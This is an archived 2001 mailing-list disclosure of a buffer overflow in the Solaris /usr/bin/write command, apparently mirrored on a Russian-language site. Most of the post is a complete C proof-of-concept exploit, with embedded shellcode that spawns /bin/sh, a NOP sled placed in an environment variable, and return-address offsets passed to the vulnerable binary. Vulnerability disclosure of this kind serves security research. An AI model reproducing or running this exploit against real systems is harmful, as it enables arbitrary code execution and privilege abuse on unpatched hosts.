Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Date: Wed, 17 Jan 2001 09:06:15 -0300
From: Pablo Sor <[email protected]>
To: [email protected]
Subject: Solaris /usr/bin/write Vulnerability

I have written an exploit for the /usr/bin/write command , this is not a
new
vulnerability but it has not been fixed at least till Solaris 7 patchs
(dont know about Solaris 8).
This command contains a buffer overflow in the second argument. If this
data exceeds predefined length, inserting two values into the argument
it is
possible to copy the first one into the memory position pointed by the
second
one, using this technique it is possible to execute arbitrary commands.
I have seen some messages saying that this vulnerability could not be
exploited eitherway
this command has sgid tty so I do not think it could generate serious
privileges problems.


Technical Description - Exploit/Concept Code:


#include <stdio.h>
#include <unistd.h>
/*

 /usr/bin/write overflow proof of conecpt.

 Tested on Solaris 7 x86

 Pablo Sor, Buenos Aires, Argentina. 01/2000
 [email protected]

 usage: write-exp [shell_offset] [ret_addr_offset]

 default offset should work.

*/
long get_esp() { __asm__("movl %esp,%eax"); }

char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
               "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
               "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
               "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
               "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
               "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
               "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
               "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
               "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
               "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
               "\xff\xff";

               /* shellcode by Cheez Whiz */

void main(int argc,char **argv)
{
FILE *fp;
long magic,magicret;
char buf[100],*envi;
int i;

envi = (char *) malloc(1000*sizeof(char));
memset(envi,0x90,1000);
memcpy(envi,"SOR=",4);
memcpy(envi+980-strlen(shell),shell,strlen(shell));
envi[1000]=0;
putenv(envi);

if (argc!=3)
{
 magicret = get_esp()+116;
 magic = get_esp()-1668;
}
else
{
 magicret = get_esp()+atoi(argv[1]);
 magic = get_esp()+atoi(argv[2]);
}

memset(buf,0x41,100);
buf[99]=0;
memcpy(buf+91,&magic,4);
for(i=0;i<22;++i) memcpy(buf+(i*4),&magicret,4);
execl("/usr/bin/write","write","root",buf,(char *)0);
}

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>

Партнёры:

Хостинг: